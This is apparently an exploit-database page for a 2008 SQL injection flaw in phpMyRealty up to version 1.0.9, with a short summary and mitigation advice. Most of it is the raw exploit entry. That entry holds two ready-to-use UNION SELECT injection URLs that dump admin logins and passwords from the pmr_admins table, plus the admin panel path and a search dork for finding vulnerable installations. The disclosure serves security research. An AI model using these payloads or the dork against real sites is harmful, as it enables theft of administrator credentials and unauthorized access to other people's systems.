header-logo
Suggest Exploit
vendor:
phpMyRealty
by:
~!Dok_tOR!~
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpMyRealty
Affected Version From: 1.0.7
Affected Version To: 1.0.9
Patch Exists: No
Related CWE: N/A
CPE: a:phpmyrealty:phpmyrealty:1.0.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability

Two exploits are available for this vulnerability. The first exploit is a URL that can be used to inject malicious SQL code into the vulnerable application. The second exploit is a search query that can be used to inject malicious SQL code into the vulnerable application. Both exploits can be used to gain access to the admin panel.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability

 Author: ~!Dok_tOR!~
 Date found: 27.08.08
 Product: phpMyRealty
 Version: 1.0.7, 1.0.9
 Download script: http://rapidshare.com/files/123835319/phpMyRealty.v1.0.7.PHP-rs.rar
 Vulnerability Class: SQL Injection

 Exploit 1:

 http://localhost/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*

 Exploit 2:

 http://localhost/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*

 Admin panel:

 http://localhost/[installdir]/admin/

 Dork: 

 Powered by phpMyRealty 1.0.7
 Powered by phpMyRealty.com

# milw0rm.com [2008-08-27]